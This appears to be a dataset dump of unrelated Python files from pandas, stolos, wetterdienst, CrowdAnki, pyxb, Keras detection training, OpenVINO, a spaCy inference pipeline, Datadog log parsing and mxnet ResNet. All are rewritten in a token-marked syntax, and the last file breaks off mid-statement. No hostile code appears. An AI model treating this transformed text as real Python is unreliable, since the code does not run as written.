content (string, lengths 0 to 1.55M)
<import_stmt>pytest<import_from_stmt>pandas.errors NullFrequencyError<import_stmt>pandas<as>pd<import_from_stmt>pandas TimedeltaIndex<import_stmt>pandas._testing<as>tm<class_stmt>TestTimedeltaIndexShift# ------------------------------------------------------------- # TimedeltaIndex.shift is used by __add__/__sub__ <block_start><def_stmt>test_tdi_shift_empty self# GH#9903 <block_start>idx=pd.TimedeltaIndex([] name="xxx")<line_sep>tm.assert_index_equal(idx.shift(0 freq="H") idx)<line_sep>tm.assert_index_equal(idx.shift(3 freq="H") idx)<block_end><def_stmt>test_tdi_shift_hours self# GH#9903 <block_start>idx=pd.TimedeltaIndex(["5 hours" "6 hours" "9 hours"] name="xxx")<line_sep>tm.assert_index_equal(idx.shift(0 freq="H") idx)<line_sep>exp=pd.TimedeltaIndex(["8 hours" "9 hours" "12 hours"] name="xxx")<line_sep>tm.assert_index_equal(idx.shift(3 freq="H") exp)<line_sep>exp=pd.TimedeltaIndex(["2 hours" "3 hours" "6 hours"] name="xxx")<line_sep>tm.assert_index_equal(idx.shift(-3 freq="H") exp)<block_end><def_stmt>test_tdi_shift_minutes self# GH#9903 <block_start>idx=pd.TimedeltaIndex(["5 hours" "6 hours" "9 hours"] name="xxx")<line_sep>tm.assert_index_equal(idx.shift(0 freq="T") idx)<line_sep>exp=pd.TimedeltaIndex(["05:03:00" "06:03:00" "9:03:00"] name="xxx")<line_sep>tm.assert_index_equal(idx.shift(3 freq="T") exp)<line_sep>exp=pd.TimedeltaIndex(["04:57:00" "05:57:00" "8:57:00"] name="xxx")<line_sep>tm.assert_index_equal(idx.shift(-3 freq="T") exp)<block_end><def_stmt>test_tdi_shift_int self# GH#8083 <block_start>tdi=pd.to_timedelta(range(5) unit="d")<line_sep>trange=tdi._with_freq("infer")+pd.offsets.Hour(1)<line_sep>result=trange.shift(1)<line_sep>expected=TimedeltaIndex(["1 days 01:00:00" "2 days 01:00:00" "3 days 01:00:00" "4 days 01:00:00" "5 days 01:00:00" ] freq="D" )<line_sep>tm.assert_index_equal(result expected)<block_end><def_stmt>test_tdi_shift_nonstandard_freq self# GH#8083 <block_start>tdi=pd.to_timedelta(range(5) unit="d")<line_sep>trange=tdi._with_freq("infer")+pd.offsets.Hour(1)<line_sep>result=trange.shift(3 freq="2D 1s")<line_sep>expected=TimedeltaIndex(["6 days 01:00:03" "7 days 01:00:03" "8 days 01:00:03" "9 days 01:00:03" "10 days 01:00:03" ] freq="D" )<line_sep>tm.assert_index_equal(result expected)<block_end><def_stmt>test_shift_no_freq self# GH#19147 <block_start>tdi=TimedeltaIndex(["1 days 01:00:00" "2 days 01:00:00"] freq=<none>)<with_stmt>pytest.raises(NullFrequencyError match="Cannot shift with no freq")<block_start>tdi.shift(2)<block_end><block_end><block_end>
<import_stmt>os<import_from_stmt>subprocess check_output CalledProcessError<import_from_stmt>nose tools<as>nt<import_from_stmt>stolos queue_backend<as>qb<import_from_stmt>stolos.testing_tools with_setup validate_zero_queued_task validate_one_queued_task validate_n_queued_task <def_stmt>run cmd tasks_json_tmpfile **kwargs<block_start>cmd=("set -o pipefail ; STOLOS_TASKS_JSON={tasks_json} {cmd}").format(cmd=cmd tasks_json=tasks_json_tmpfile **kwargs)<line_sep>rv=check_output(cmd shell=<true> executable="bash" env=os.environ)<line_sep><return>rv<block_end>@with_setup<def_stmt>test_stolos_submit app1 job_id1 tasks_json_tmpfile<block_start><with_stmt>nt.assert_raises(CalledProcessError)<block_start>run("stolos-submit -h" tasks_json_tmpfile)<block_end>validate_zero_queued_task(app1)<line_sep>run("stolos-submit -a %s -j %s"%(app1 job_id1) tasks_json_tmpfile)<line_sep>validate_one_queued_task(app1 job_id1)<line_sep>run("stolos-submit -a %s -j %s"%(app1 job_id1) tasks_json_tmpfile)<line_sep>validate_one_queued_task(app1 job_id1)<block_end>@with_setup<def_stmt>test_stolos_submit_readd app1 job_id1 tasks_json_tmpfile<block_start>qb.set_state(app1 job_id1 failed=<true>)<line_sep>validate_zero_queued_task(app1)<line_sep>run("stolos-submit -a %s -j %s"%(app1 job_id1) tasks_json_tmpfile)<line_sep>validate_zero_queued_task(app1)<line_sep>run("stolos-submit -a %s -j %s --readd"%(app1 job_id1) tasks_json_tmpfile)<line_sep>validate_one_queued_task(app1 job_id1)<block_end>@with_setup<def_stmt>test_stolos_submit_multiple_jobs app1 app2 job_id1 job_id2 tasks_json_tmpfile<block_start>validate_zero_queued_task(app1)<line_sep>validate_zero_queued_task(app2)<line_sep>run("stolos-submit -a %s %s -j %s %s"%(app1 app2 job_id1 job_id2) tasks_json_tmpfile)<line_sep>validate_n_queued_task(app1 job_id1 job_id2)<line_sep>validate_n_queued_task(app2 job_id1 job_id2)<line_sep>run("stolos-submit -a %s %s -j %s %s"%(app1 app2 job_id1 job_id2) tasks_json_tmpfile)<line_sep>validate_n_queued_task(app1 job_id1 job_id2)<line_sep>validate_n_queued_task(app2 job_id1 job_id2)<block_end>
# -*- coding: utf-8 -*- # Copyright (c) 2018-2021, earthobservations developers. # Distributed under the MIT License. See LICENSE for more info. <import_stmt>pytest<import_from_stmt>wetterdienst Wetterdienst<line_sep>@pytest.mark.remote@pytest.mark.parametrize("provider,kind,kwargs" [# German Weather Service (DWD) ("dwd" "observation" {"parameter":"kl" "resolution":"daily" "period":"recent"} ) ("dwd" "forecast" {"parameter":"large" "mosmix_type":"large"}) # Environment and Climate Change Canada ("eccc" "observation" {"parameter":"daily" "resolution":"daily"}) ] )@pytest.mark.parametrize("si_units" (<false> <true>))<def_stmt>test_api provider kind kwargs si_units<block_start>""" Test main wetterdienst API """<line_sep># Build API api=Wetterdienst(provider kind)<line_sep># Discover parameters <assert_stmt>api.discover()<line_sep># All stations request=api(**kwargs si_units=si_units).all()<line_sep>stations=request.df<line_sep># Check stations DataFrame columns <assert_stmt>set(stations.columns).issuperset({"station_id" "from_date" "to_date" "height" "latitude" "longitude" "name" "state" })<line_sep># Check that there are actually stations <assert_stmt><not>stations.empty<line_sep># Query first DataFrame from values values=next(request.values.query()).df<line_sep># TODO: DWD Forecast has no quality <assert_stmt>set(values.columns).issuperset({"station_id" "parameter" "date" "value" "quality"})<assert_stmt><not>values.empty<block_end>
<import_from_stmt>pathlib Path<import_from_stmt>.anki_exporter AnkiJsonExporter<import_from_stmt>..anki.adapters.anki_deck AnkiDeck<import_from_stmt>..config.config_settings ConfigSettings<import_from_stmt>..utils constants<import_from_stmt>..utils.notifier AnkiModalNotifier Notifier<import_from_stmt>..utils.disambiguate_uuids disambiguate_note_model_uuids<line_sep>EXPORT_FAILED_TITLE="Export failed"<class_stmt>AnkiJsonExporterWrapper<block_start>""" Wrapper designed to work with standard export dialog in anki. """<line_sep>key="CrowdAnki JSON representation"<line_sep>ext=constants.ANKI_EXPORT_EXTENSION<line_sep>hideTags=<true><line_sep>includeTags=<true><line_sep>directory_export=<true><def_stmt>__init__ self collection deck_id:int=<none> json_exporter:AnkiJsonExporter=<none> notifier:Notifier=<none><block_start>self.includeMedia=<true><line_sep>self.did=deck_id<line_sep>self.count=0# Todo? self.collection=collection<line_sep>self.anki_json_exporter=json_exporter<or>AnkiJsonExporter(collection ConfigSettings.get_instance())<line_sep>self.notifier=notifier<or>AnkiModalNotifier()<block_end># required by anki exporting interface with its non-PEP-8 names # noinspection PyPep8Naming <def_stmt>exportInto self directory_path<block_start><if_stmt>self.did<is><none><block_start>self.notifier.warning(EXPORT_FAILED_TITLE "CrowdAnki export works only for specific decks. "<concat>"Please use CrowdAnki snapshot if you want to export "<concat>"the whole collection.")<line_sep><return><block_end>deck=AnkiDeck(self.collection.decks.get(self.did default=<false>))<if_stmt>deck.is_dynamic<block_start>self.notifier.warning(EXPORT_FAILED_TITLE "CrowdAnki does not support export for dynamic decks.")<line_sep><return><block_end># Clean up duplicate note models. See # https://github.com/Stvad/CrowdAnki/wiki/Workarounds-%E2%80%94-Duplicate-note-model-uuids. disambiguate_note_model_uuids(self.collection)<line_sep># .parent because we receive name with random numbers at the end (hacking around internals of Anki) :( export_path=Path(directory_path).parent<line_sep>self.anki_json_exporter.export_to_directory(deck export_path self.includeMedia create_deck_subdirectory=ConfigSettings.get_instance().export_create_deck_subdirectory)<line_sep>self.count=self.anki_json_exporter.last_exported_count<block_end><block_end><def_stmt>get_exporter_id exporter<block_start><return>f"{exporter.key} (*{exporter.ext})" exporter<block_end><def_stmt>exporters_hook exporters_list<block_start>exporter_id=get_exporter_id(AnkiJsonExporterWrapper)<if_stmt>exporter_id<not><in>exporters_list<block_start>exporters_list.append(exporter_id)<block_end><block_end>
# -*- coding: utf-8 -*- <import_stmt>logging<if_stmt>__name__<eq>'__main__'<block_start>logging.basicConfig()<block_end>_log=logging.getLogger(__name__)<import_stmt>pyxb.binding.generate<import_stmt>pyxb.binding.datatypes<as>xs<import_stmt>pyxb.binding.basis<import_stmt>pyxb.utils.domutils<import_stmt>os.path<line_sep>xsd='''<?xml version="1.0" encoding="UTF-8"?> <xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"> <xs:simpleType name="foo"/> </xs:schema>'''<import_from_stmt>pyxb.exceptions_ *<import_stmt>unittest<class_stmt>TestTrac_200908181430(unittest.TestCase)<block_start><def_stmt>testParsing self<block_start>self.assertRaises(pyxb.SchemaValidationError pyxb.binding.generate.GeneratePython schema_text=xsd)<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>unittest.main()<block_end>
<import_stmt>numpy<as>np<import_stmt>tensorflow<as>tf<import_from_stmt>keras backend<as>K<import_from_stmt>tqdm tqdm<def_stmt>write_log callback names logs batch_no<block_start><for_stmt>name,value zip(names logs)<block_start>summary=tf.Summary()<line_sep>summary_value=summary.value.add()<line_sep>summary_value.simple_value=value<line_sep>summary_value.tag=name<line_sep>callback.writer.add_summary(summary batch_no)<line_sep>callback.writer.flush()<block_end><block_end><def_stmt>fit_one_epoch model_rpn model_all loss_history callback epoch epoch_step epoch_step_val gen gen_val Epoch anchors bbox_util roi_helper<block_start>total_loss=0<line_sep>rpn_loc_loss=0<line_sep>rpn_cls_loss=0<line_sep>roi_loc_loss=0<line_sep>roi_cls_loss=0<line_sep>val_loss=0<with_stmt>tqdm(total=epoch_step desc=f'Epoch {epoch+1}/{Epoch}' postfix=dict mininterval=0.3)<as>pbar<block_start><for_stmt>iteration,batch enumerate(gen)<block_start><if_stmt>iteration<ge>epoch_step<block_start><break><block_end>X,Y,boxes=batch[0] batch[1] batch[2]<line_sep>P_rpn=model_rpn.predict_on_batch(X)<line_sep>results=bbox_util.detection_out_rpn(P_rpn anchors)<line_sep>roi_inputs=[]<line_sep>out_classes=[]<line_sep>out_regrs=[]<for_stmt>i range(len(X))<block_start>R=results[i]<line_sep>X2,Y1,Y2=roi_helper.calc_iou(R boxes[i])<line_sep>roi_inputs.append(X2)<line_sep>out_classes.append(Y1)<line_sep>out_regrs.append(Y2)<block_end>loss_class=model_all.train_on_batch([X np.array(roi_inputs)] [Y[0] Y[1] np.array(out_classes) np.array(out_regrs)])<line_sep>write_log(callback ['total_loss' 'rpn_cls_loss' 'rpn_reg_loss' 'detection_cls_loss' 'detection_reg_loss'] loss_class iteration)<line_sep>rpn_cls_loss<augadd>loss_class[1]<line_sep>rpn_loc_loss<augadd>loss_class[2]<line_sep>roi_cls_loss<augadd>loss_class[3]<line_sep>roi_loc_loss<augadd>loss_class[4]<line_sep>total_loss=rpn_loc_loss+rpn_cls_loss+roi_loc_loss+roi_cls_loss<line_sep>pbar.set_postfix(**{'total':total_loss/(iteration+1) 'rpn_cls':rpn_cls_loss/(iteration+1) 'rpn_loc':rpn_loc_loss/(iteration+1) 'roi_cls':roi_cls_loss/(iteration+1) 'roi_loc':roi_loc_loss/(iteration+1) 'lr':K.get_value(model_rpn.optimizer.lr)})<line_sep>pbar.update(1)<block_end><block_end>print('Start Validation')<with_stmt>tqdm(total=epoch_step_val desc=f'Epoch {epoch+1}/{Epoch}' postfix=dict mininterval=0.3)<as>pbar<block_start><for_stmt>iteration,batch enumerate(gen_val)<block_start><if_stmt>iteration<ge>epoch_step_val<block_start><break><block_end>X,Y,boxes=batch[0] batch[1] batch[2]<line_sep>P_rpn=model_rpn.predict_on_batch(X)<line_sep>results=bbox_util.detection_out_rpn(P_rpn anchors)<line_sep>roi_inputs=[]<line_sep>out_classes=[]<line_sep>out_regrs=[]<for_stmt>i range(len(X))<block_start>R=results[i]<line_sep>X2,Y1,Y2=roi_helper.calc_iou(R boxes[i])<line_sep>roi_inputs.append(X2)<line_sep>out_classes.append(Y1)<line_sep>out_regrs.append(Y2)<block_end>loss_class=model_all.test_on_batch([X np.array(roi_inputs)] [Y[0] Y[1] np.array(out_classes) np.array(out_regrs)])<line_sep>val_loss<augadd>loss_class[0]<line_sep>pbar.set_postfix(**{'total':val_loss/(iteration+1)})<line_sep>pbar.update(1)<block_end><block_end>logs={'loss':total_loss/epoch_step 'val_loss':val_loss/epoch_step_val}<line_sep>loss_history.on_epoch_end([] logs)<line_sep>print('Epoch:'+str(epoch+1)+'/'+str(Epoch))<line_sep>print('Total Loss: %.3f || Val Loss: %.3f '%(total_loss/epoch_step val_loss/epoch_step_val))<line_sep>model_all.save_weights('logs/ep%03d-loss%.3f-val_loss%.3f.h5'%(epoch+1 total_loss/epoch_step val_loss/epoch_step_val))<block_end>
# Copyright (C) 2020-2022 Intel Corporation # SPDX-License-Identifier: Apache-2.0 <import_from_stmt>.pattern_utils check_fused_scale_shift_patterns get_fused_scale_shift_patterns check_fused_op_const_patterns get_fused_op_const_pattern get_clamp_mult_const_pattern<def_stmt>get_gpu_ignored_patterns <block_start><return>{'blocks':[(pattern check_fused_scale_shift_patterns)<for>pattern get_fused_scale_shift_patterns()]+[(pattern check_fused_op_const_patterns)<for>pattern get_fused_op_const_pattern()] 'activations':[get_clamp_mult_const_pattern()] 'inputs':[]}<block_end>
<import_from_stmt>typing Tuple<import_stmt>torch<class_stmt>RunningMeanStd<block_start>""" Utility Function to compute a running mean and variance calculator :param epsilon: Small number to prevent division by zero for calculations :param shape: Shape of the RMS object :type epsilon: float :type shape: Tuple """<def_stmt>__init__ self epsilon:float=1e-4 shape:Tuple=()<block_start>self.mean=torch.zeros(shape).double()<line_sep>self.var=torch.ones(shape).double()<line_sep>self.count=epsilon<block_end><def_stmt>update self batch:torch.Tensor<block_start>batch_mean=torch.mean(batch axis=0)<line_sep>batch_var=torch.var(batch axis=0)<line_sep>batch_count=batch.shape[0]<line_sep>total_count=self.count+batch_count<line_sep>delta=batch_mean-self.mean<line_sep>new_mean=self.mean+delta<times>batch_count/total_count<line_sep>M2=(self.var<times>self.count+batch_var<times>batch_count+(delta<power>2)<times>self.count<times>batch_count/total_count)<line_sep>self.mean=new_mean<line_sep>self.var=M2/(total_count-1)<line_sep>self.count=total_count<block_end><block_end>
<import_stmt>os<import_stmt>subprocess<import_stmt>sys<import_from_stmt>typing Dict List<import_from_stmt>app.pipelines Pipeline<class_stmt>TextClassificationPipeline(Pipeline)<block_start><def_stmt>__init__ self model_id:str # At the time, only public models from spaCy are allowed in the inference API. <block_start>full_model_path=model_id.split("/")<if_stmt>len(full_model_path)<ne>2<block_start><raise>ValueError(f"Invalid model_id: {model_id}. It should have a namespace (:namespace:/:model_name:)")<block_end>namespace,model_name=full_model_path<line_sep>package=f"https://huggingface.co/{namespace}/{model_name}/resolve/main/{model_name}-any-py3-none-any.whl"<line_sep>cache_dir=os.environ["PIP_CACHE"]<line_sep>subprocess.check_call([sys.executable "-m" "pip" "install" "--cache-dir" cache_dir package])<import_stmt>spacy<line_sep>self.model=spacy.load(model_name)<block_end><def_stmt>__call__ self inputs:str<arrow>List[List[Dict[str float]]]<block_start>""" Args: inputs (:obj:`str`): a string containing some text Return: A :obj:`list`:. The object returned should be a list of one list like [[{"label": 0.9939950108528137}]] containing : - "label": A string representing what the label/class is. There can be multiple labels. - "score": A score between 0 and 1 describing how confident the model is for this label/class. """<line_sep>doc=self.model(inputs)<line_sep>categories=[]<for_stmt>cat,score doc.cats.items()<block_start>categories.append({"label":cat "score":score})<block_end><return>[categories]<block_end><block_end>
<import_from_stmt>unittest.mock MagicMock patch<import_stmt>os<import_stmt>sys<import_stmt>unittest<import_stmt>json<import_stmt>copy<import_stmt>io<import_stmt>gzip<line_sep>sys.modules["trace_forwarder.connection"]=MagicMock()<line_sep>sys.modules["datadog_lambda.wrapper"]=MagicMock()<line_sep>sys.modules["datadog_lambda.metric"]=MagicMock()<line_sep>sys.modules["datadog"]=MagicMock()<line_sep>sys.modules["requests"]=MagicMock()<line_sep>sys.modules["requests_futures.sessions"]=MagicMock()<line_sep>env_patch=patch.dict(os.environ {"DD_API_KEY":"11111111111111111111111111111111" "DD_ADDITIONAL_TARGET_LAMBDAS":"ironmaiden,megadeth" } )<line_sep>env_patch.start()<import_stmt>lambda_function<import_stmt>parsing<line_sep>env_patch.stop()<class_stmt>Context<block_start>function_version=0<line_sep>invoked_function_arn="invoked_function_arn"<line_sep>function_name="function_name"<line_sep>memory_limit_in_mb="10"<block_end>test_data={"Records":[{"eventVersion":"1.08" "userIdentity":{"type":"AssumedRole" "principalId":"AROAYYB64AB3HGPQO2EPR:DatadogAWSIntegration" "arn":"arn:aws:sts::601427279990:assumed-role/Siti_DatadogAWSIntegrationRole/i-08014e4f62ccf762d" "accountId":"601427279990" "accessKeyId":"ASIAYYB64AB3DWOY7JNT" "sessionContext":{"sessionIssuer":{"type":"Role" "principalId":"AROAYYB64AB3HGPQO2EPR" "arn":"arn:aws:iam::601427279990:role/Siti_DatadogAWSIntegrationRole" "accountId":"601427279990" "userName":"Siti_DatadogAWSIntegrationRole" } "attributes":{"creationDate":"2021-05-02T23:49:01Z" "mfaAuthenticated":"false" } } } "eventTime":"2021-05-02T23:53:28Z" "eventSource":"dynamodb.amazonaws.com" "eventName":"DescribeTable" "awsRegion":"us-east-1" "sourceIPAddress":"172.16.31.10" "userAgent":"Datadog" "requestParameters":{"tableName":"KinesisClientLibraryLocal"} "responseElements":<none> "requestID":"A9K7562IBO4MPDQE4O5G9QETRFVV4KQNSO5AEMVJF66Q9ASUAAJG" "eventID":"a5dd11f9-f616-4ea8-8030-0b3eef554352" "readOnly":<true> "resources":[{"accountId":"601427279990" "type":"AWS::DynamoDB::Table" "ARN":"arn:aws:dynamodb:us-east-1:601427279990:table/KinesisClientLibraryLocal" }] "eventType":"AwsApiCall" "apiVersion":"2012-08-10" "managementEvent":<true> "recipientAccountId":"601427279990" "eventCategory":"Management" }]}<def_stmt>test_data_gzipped <arrow>io.BytesIO<block_start><return>io.BytesIO(gzip.compress(json.dumps(copy.deepcopy(test_data)).encode("utf-8")))<block_end><class_stmt>TestS3CloudwatchParsing(unittest.TestCase)<block_start><def_stmt>setUp self<block_start>self.maxDiff=9000<block_end>@patch("parsing.boto3")@patch("lambda_function.boto3")<def_stmt>test_s3_cloudtrail_pasing_and_enrichment self lambda_boto3 parsing_boto3<block_start>context=Context()<line_sep>boto3=parsing_boto3.client()<line_sep>boto3.get_object.return_value={"Body":test_data_gzipped()}<line_sep>payload={"s3":{"bucket":{"name":"test-bucket" } "object":{"key":"<KEY>"} }}<line_sep>result=parsing.parse({"Records":[payload]} context)<line_sep>expected=copy.deepcopy([test_data["Records"][0]])<line_sep>expected[0].update({"ddsource":"cloudtrail" "ddsourcecategory":"aws" "service":"cloudtrail" "aws":{"s3":{"bucket":payload["s3"]["bucket"]["name"] "key":payload["s3"]["object"]["key"] } "function_version":context.function_version "invoked_function_arn":context.invoked_function_arn } })<line_sep># yeah, there are tags, but we don't care to compare them result[0].pop("ddtags")<line_sep># expected parsed result, now testing enrichment self.assertEqual(expected[0] 
result[0])<line_sep>expected[0]["host"]="i-08014e4f62ccf762d"<line_sep>self.assertEqual(expected[0] lambda_function.enrich(result)[0])<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>unittest.main()<block_end>
<import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<import_stmt>mxnet<as>mx<import_stmt>numpy<as>np<import_from_stmt>config config<def_stmt>Conv **kwargs<block_start>body=mx.sym.Convolution(**kwargs)<line_sep><return>body<block_end><def_stmt>Act data act_type name<block_start><if_stmt>act_type<eq>'prelu'<block_start>body=mx.sym.LeakyReLU(data=data act_type='prelu' name=name)<block_end><else_stmt><block_start>body=mx.symbol.Activation(data=data act_type=act_type name=name)<block_end><return>body<block_end><def_stmt>ConvFactory data num_filter kernel stride=(1 1) pad=(0 0) act_type="relu" mirror_attr={} with_act=<true> dcn=<false> name=''<block_start>bn_mom=config.bn_mom<line_sep>workspace=config.workspace<if_stmt><not>dcn<block_start>conv=mx.symbol.Convolution(data=data num_filter=num_filter kernel=kernel stride=stride pad=pad no_bias=<true> workspace=workspace name=name+'_conv')<block_end><else_stmt><block_start>conv_offset=mx.symbol.Convolution(name=name+'_conv_offset' data=data num_filter=18 pad=(1 1) kernel=(3 3) stride=(1 1))<line_sep>conv=mx.contrib.symbol.DeformableConvolution(name=name+"_conv" data=data offset=conv_offset num_filter=num_filter pad=(1 1) kernel=(3 3) num_deformable_group=1 stride=stride dilate=(1 1) no_bias=<false>)<block_end>bn=mx.symbol.BatchNorm(data=conv fix_gamma=<false> momentum=bn_mom eps=2e-5 name=name+'_bn')<if_stmt>with_act<block_start>act=Act(bn act_type name=name+'_relu')<line_sep>#act = mx.symbol.Activation( # data=bn, act_type=act_type, attr=mirror_attr, name=name+'_relu') <return>act<block_end><else_stmt><block_start><return>bn<block_end><block_end><def_stmt>conv_resnet data num_filter stride dim_match name binarize dcn dilate **kwargs<block_start>bit=1<line_sep>ACT_BIT=config.ACT_BIT<line_sep>bn_mom=config.bn_mom<line_sep>workspace=config.workspace<line_sep>memonger=config.memonger<line_sep>#print('in unit2') # the same as https://github.com/facebook/fb.resnet.torch#notes, a bit difference with origin paper bn1=mx.sym.BatchNorm(data=data fix_gamma=<false> eps=2e-5 momentum=bn_mom name=name+'_bn1')<if_stmt><not>binarize<block_start>act1=Act(data=bn1 act_type='relu' name=name+'_relu1')<line_sep>conv1=Conv(data=act1 num_filter=int(num_filter<times>0.5) kernel=(1 1) stride=(1 1) pad=(0 0) no_bias=<true> workspace=workspace name=name+'_conv1')<block_end><else_stmt><block_start>act1=mx.sym.QActivation(data=bn1 act_bit=ACT_BIT name=name+'_relu1' backward_only=<true>)<line_sep>conv1=mx.sym.QConvolution(data=act1 num_filter=int(num_filter<times>0.5) kernel=(1 1) stride=(1 1) pad=(0 0) no_bias=<true> workspace=workspace name=name+'_conv1' act_bit=ACT_BIT weight_bit=bit)<block_end>bn2=mx.sym.BatchNorm(data=conv1 fix_gamma=<false> eps=2e-5 momentum=bn_mom name=name+'_bn2')<if_stmt><not>binarize<block_start>act2=Act(data=bn2 act_type='relu' name=name+'_relu2')<line_sep>conv2=Conv(data=act2 num_filter=int(num_filter<times>0.5) kernel=(3 3) stride=(1 1) pad=(1 1) no_bias=<true> workspace=workspace name=name+'_conv2')<block_end><else_stmt><block_start>act2=mx.sym.QActivation(data=bn2 act_bit=ACT_BIT name=name+'_relu2' backward_only=<true>)<line_sep>conv2=mx.sym.QConvolution(data=act2 num_filter=int(num_filter<times>0.5) kernel=(3 3) stride=(1 1) pad=(1 1) no_bias=<true> workspace=workspace name=name+'_conv2' act_bit=ACT_BIT weight_bit=bit)<block_end>bn3=mx.sym.BatchNorm(data=conv2 fix_gamma=<false> eps=2e-5 momentum=bn_mom name=name+'_bn3')<if_stmt><not>binarize<block_start>act3=Act(data=bn3 
act_type='relu' name=name+'_relu3')<line_sep>conv3=Conv(data=act3 num_filter=num_filter kernel=(1 1) stride=(1 1) pad=(0 0) no_bias=<true> workspace=workspace name=name+'_conv3')<block_end><else_stmt><block_start>act3=mx.sym.QActivation(data=bn3 act_bit=ACT_BIT name=name+'_relu3' backward_only=<true>)<line_sep>conv3=mx.sym.QConvolution(data=act3 num_filter=num_filter kernel=(1 1) stride=(1 1) pad=(0 0) no_bias=<true> workspace=workspace name=name+'_conv3' act_bit=ACT_BIT weight_bit=bit)<block_end>#if binarize: # conv3 = mx.sym.BatchNorm(data=conv3, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn4') <if_stmt>dim_match<block_start>shortcut=data<block_end><else_stmt><block_start><if_stmt><not>binarize<block_start>shortcut=Conv(data=act1 num_filter=num_filter kernel=(1 1) stride=stride no_bias=<true> workspace=workspace name=name+'_sc')<block_end><else_stmt><block_start>shortcut=mx.sym.QConvolution(data=act1 num_filter=num_filter kernel=(1 1) stride=stride pad=(0 0) no_bias=<true> workspace=workspace name=name+'_sc' act_bit=ACT_BIT weight_bit=bit)<block_end><block_end><if_stmt>memonger<block_start>shortcut._set_attr(mirror_stage='True')<block_end><return>conv3+shortcut<block_end><def_stmt>conv_hpm data num_filter stride dim_match name binarize dcn dilation **kwargs<block_start>bit=1<line_sep>ACT_BIT=config.ACT_BIT<line_sep>bn_mom=config.bn_mom<line_sep>workspace=config.workspace<line_sep>memonger=config.memonger<line_sep>#print('in unit2') # the same as https://github.com/facebook/fb.resnet.torch#notes, a bit difference with origin paper bn1=mx.sym.BatchNorm(data=data fix_gamma=<false> eps=2e-5 momentum=bn_mom name=name+'_bn1')<if_stmt><not>binarize<block_start>act1=Act(data=bn1 act_type='relu' name=name+'_relu1')<if_stmt><not>dcn<block_start>conv1=Conv(data=act1 num_filter=int(num_filter<times>0.5) kernel=(3 3) stride=(1 1) pad=(dilation dilation) dilate=(dilation dilation) no_bias=<true> workspace=workspace name=name+'_conv1')<block_end><else_stmt><block_start>conv1_offset=mx.symbol.Convolution(name=name+'_conv1_offset' data=act1 num_filter=18 pad=(1 1) kernel=(3 3) stride=(1 1))<line_sep>conv1=mx.contrib.symbol.DeformableConvolution(name=name+'_conv1' data=act1 offset=conv1_offset num_filter=int(num_filter<times>0.5) pad=(1 1) kernel=(3 3) num_deformable_group=1 stride=(1 1) dilate=(1 1) no_bias=<true>)<block_end><block_end><else_stmt><block_start>act1=mx.sym.QActivation(data=bn1 act_bit=ACT_BIT name=name+'_relu1' backward_only=<true>)<line_sep>conv1=mx.sym.QConvolution_v1(data=act1 num_filter=int(num_filter<times>0.5) kernel=(3 3) stride=(1 1) pad=(1 1) no_bias=<true> workspace=workspace name=name+'_conv1' act_bit=ACT_BIT weight_bit=bit)<block_end>bn2=mx.sym.BatchNorm(data=conv1 fix_gamma=<false> eps=2e-5 momentum=bn_mom name=name+'_bn2')<if_stmt><not>binarize<block_start>act2=Act(data=bn2 act_type='relu' name=name+'_relu2')<if_stmt><not>dcn<block_start>conv2=Conv(data=act2 num_filter=int(num_filter<times>0.25) kernel=(3 3) stride=(1 1) pad=(dilation dilation) dilate=(dilation dilation) no_bias=<true> workspace=workspace name=name+'_conv2')<block_end><else_stmt><block_start>conv2_offset=mx.symbol.Convolution(name=name+'_conv2_offset' data=act2 num_filter=18 pad=(1 1) kernel=(3 3) stride=(1 1))<line_sep>conv2=mx.contrib.symbol.DeformableConvolution(name=name+'_conv2' data=act2 offset=conv2_offset num_filter=int(num_filter<times>0.25) pad=(1 1) kernel=(3 3) num_deformable_group=1 stride=(1 1) dilate=(1 1) 
no_bias=<true>)<block_end><block_end><else_stmt><block_start>act2=mx.sym.QActivation(data=bn2 act_bit=ACT_BIT name=name+'_relu2' backward_only=<true>)<line_sep>conv2=mx.sym.QConvolution_v1(data=act2 num_filter=int(num_filter<times>0.25) kernel=(3 3) stride=(1 1) pad=(1 1) no_bias=<true> workspace=workspace name=name+'_conv2' act_bit=ACT_BIT weight_bit=bit)<block_end>bn3=mx.sym.BatchNorm(data=conv2 fix_gamma=<false> eps=2e-5 momentum=bn_mom name=name+'_bn3')<if_stmt><not>binarize<block_start>act3=Act(data=bn3 act_type='relu' name=name+'_relu3')<if_stmt><not>dcn<block_start>conv3=Conv(data=act3 num_filter=int(num_filter<times>0.25) kernel=(3 3) stride=(1 1) pad=(dilation dilation) dilate=(dilation dilation) no_bias=<true> workspace=workspace name=name+'_conv3')<block_end><else_stmt><block_start>conv3_offset=mx.symbol.Convolution(name=name+'_conv3_offset' data=act3 num_filter=18 pad=(1 1) kernel=(3 3) stride=(1 1))<line_sep>conv3=mx.contrib.symbol.DeformableConvolution(name=name+'_conv3' data=act3 offset=conv3_offset num_filter=int(num_filter<times>0.25) pad=(1 1) kernel=(3 3) num_deformable_group=1 stride=(1 1) dilate=(1 1) no_bias=<true>)<block_end><block_end><else_stmt><block_start>act3=mx.sym.QActivation(data=bn3 act_bit=ACT_BIT name=name+'_relu3' backward_only=<true>)<line_sep>conv3=mx.sym.QConvolution_v1(data=act3 num_filter=int(num_filter<times>0.25) kernel=(3 3) stride=(1 1) pad=(1 1) no_bias=<true> workspace=workspace name=name+'_conv3' act_bit=ACT_BIT weight_bit=bit)<block_end>conv4=mx.symbol.Concat(*[conv1 conv2 conv3])<if_stmt>binarize<block_start>conv4=mx.sym.BatchNorm(data=conv4 fix_gamma=<false> eps=2e-5 momentum=bn_mom name=name+'_bn4')<block_end><if_stmt>dim_match<block_start>shortcut=data<block_end><else_stmt><block_start><if_stmt><not>binarize<block_start>shortcut=Conv(data=act1 num_filter=num_filter kernel=(1 1) stride=stride no_bias=<true> workspace=workspace name=name+'_sc')<block_end><else_stmt>#assert(False) <block_start>shortcut=mx.sym.QConvolution_v1(data=act1 num_filter=num_filter kernel=(1 1) stride=stride pad=(0 0) no_bias=<true> workspace=workspace name=name+'_sc' act_bit=ACT_BIT weight_bit=bit)<line_sep>shortcut=mx.sym.BatchNorm(data=shortcut fix_gamma=<false> eps=2e-5 momentum=bn_mom 